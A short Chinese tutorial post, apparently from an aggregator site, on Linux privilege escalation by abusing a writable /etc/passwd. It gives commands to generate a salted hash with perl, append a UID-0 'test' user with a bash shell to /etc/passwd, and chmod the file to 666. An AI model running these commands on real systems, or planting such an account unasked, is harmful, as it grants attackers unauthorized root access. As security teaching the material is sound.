Linux提权之利用/etc/passwd
Posted 番茄酱料
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Linux提权之利用/etc/passwd相关的知识,希望对你有一定的参考价值。
这种提权的思路说白了就是:在/etc/passwd里面创建一个root用户,然后创建的前提必须有文件的读写权限,也就是至少是666权限(任何用户都有该文件的读写权限)
演示:
1.首先查看/etc/passwd权限
命令:ls -al /etc/passwd
这里看到只有创建文件的用户有读写权限,用户所在组和其他用户只有读权限,那么我们将不能利用该文件提权,我们先试试看
2.用perl语言生成一个带盐值的密码
命令:perl -le ‘print crypt(“password@123”,“addedsalt”)’
3.我们现在构造用户写入/etc/passwd文件中
命令:echo “test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash” >>/etc/passwd
发现权限是不够的,不能写入也就代表不能利用该方式提权。
4.我们用sudo命令将其更改为任何人可读写权限
命令:sudo chmod 666 /etc/passwd
5.再次添加用户且查看该文件内容
可以看到成功写入
6.最后我们登录其查看权限
成功是root权限
以上是关于Linux提权之利用/etc/passwd的主要内容,如果未能解决你的问题,请参考以下文章